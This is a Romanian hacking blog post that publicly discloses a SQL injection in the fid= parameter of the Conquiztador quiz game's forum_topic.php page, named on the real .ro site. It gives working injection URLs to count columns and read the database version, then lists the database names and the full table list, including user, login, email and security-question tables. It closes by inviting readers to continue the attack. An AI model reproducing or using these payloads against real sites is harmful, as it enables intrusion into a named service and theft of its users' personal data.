Da…again. Cu putin timp in urma am descoperit parametrul companyid= vulnerabil. Atunci n-am facut public sintaxa pentru extragerea datelor. Adminii au primit mail, si au securizat iesirea. Conquiztador este un joc,ce se joaca in multe tari,pe aceasi platforma. Doar cel din ro avea adaugat parametrul logoclick.php?companyid= . Pentru ce credeti ca era? Pentru a face reclama. Si cui? Desigur,in mare parte,firmelor apartinatoare trustului Pro.
Dar…si zic dar, pentru ca de data asta parametrul descoperit vulnerabil este global,valabil pentru toate platformele tarilor in care se joaca jocul.(O simpla cautare pe google inurl:”forum_topic.php?fid=” va convinge)Deci parametrul vulnerabil este fid= in sintaxa forum_topic.php?fid= .Totusi pentru a putea exploata vulnerabilitatea avem nevoie de niste cunostinte sql, deoarece rezultatele nu sunt afisate simplu, in text clar.
Dar un mic exercitiu poate sa faca oricine. Sa luam adresa:http://www.conquiztador.ro/forum_topic.php?fid=5
si aflam numarul coloanelor: http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+1/* true, adica apare pagina originala. Inlocuim 1 cu 2 si tot asa pana la 5, true… La 6 vom avea http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+6/* eroare, deci avem 5 coloane.
Acum sa aflam versiunea bazei de date
select 1,unhex(hex(@@version)),3,4,5 vom avea drept rezultat: 1, 5.0.32-Debian_7etch3-log, 3, 4, 5
Numele bazelor de date sunt:
[*] cq_ro
[*] information_schema
[*] mysql
[*] mysql_old
[*] test

Pe noi ne intereseaza cq_ro. Tabele acestei baze de date sunt:

aa_unban2
aa_unban3
aa_users_chat_save
aa_users_unban
ad_download
addrbook
adperiods
advert
agecategory
askedgroups
auct_cycle
auct_hist
auct_item
auct_win
badmarking_mcq
badmarking_tq
badquestion
balance_change
balance_users
banner
bannerplace
bannerplace_old
bctrack
bctrack_user
brokenconn
cachecontrol
chatmsg
cities
clientactionlog
clinks
companies
competition
competition_games
compticket
compuser_codes
compusers
connections
costingames
countries
county
cqusers
ctrldata
dbsmlog
dbsmver
dbversion
deletedquestions
division
eventlog
faq
forum_cat
forum_msg
forum_topic
forum_topic_last
game
helppages
inv_head
inv_item
inv_unit
item_dnloads
jepgen
jeprecalc
lanswers
layerpopup
links
linktrace
login_log
loginq
loginq_temp
logins
logo_download
lqj_answers
lqj_question
lqj_targetcity
lqj_useransw
mailhead
mailmsg
mailmsg_del
moderatorlog
moneychange
moneymovecode
moneyticket
monthlystats_temp
msgfilter
news
news_head
newsletter
newslettersend
online
parameters
preloader
preloader_date
preloader_downcount
preloaderconf
qhistory
qrating
question
questioncat
questionclass
questionratinglog
questionrow
reportx
rl_competition
rl_competition_users
rl_day
rl_day_prev
rl_games
rl_jep
rl_knl_day
rl_knl_day_temp
rl_stu_grp
rl_vep
sanyistat
settings
smith_repro
smith_robot
stu_game
stu_usergame
stu_userpoints
themegroup
themes
ticketcodeerror
tipgroup
tiphistory
tipquestion
tipquestionrow
tiprating
tipthemes
tournament_fgames
tournament_qresults
tournament_usergame
tournament_users
tournaments
user_clicks
useragent
useransstat
usergame
usergame_comp
userpoints
userpoints_comp
users
users_addr
users_chat
users_data
users_email
users_extra
users_flaggers
users_forum
users_gold_temp
users_gold_temp2
users_locations
users_names
users_names_deny
users_presence
users_questions
users_questions_action
users_questions_admindesc
users_secureq
ws_basket
ws_cat
ws_deliver
ws_images
ws_itemmove
ws_movetype
ws_orderhead
ws_orderitem
ws_orderstates
ws_product
zipcodes

Mai departe faceti voi.

Related Posts

• December 24, 2009 -- Forumul Andreei Balan spart
• December 22, 2009 -- Fun cu NemoExpres.ro
• December 11, 2009 -- Kaspersky Thailand hacked by TinKode
• December 11, 2009 -- Deface pe site-ul fundatiei Dan Voiculescu pentru Dezvoltarea Romaniei (fudv.ro)
• December 10, 2009 -- Another Nasa website hacked by romanians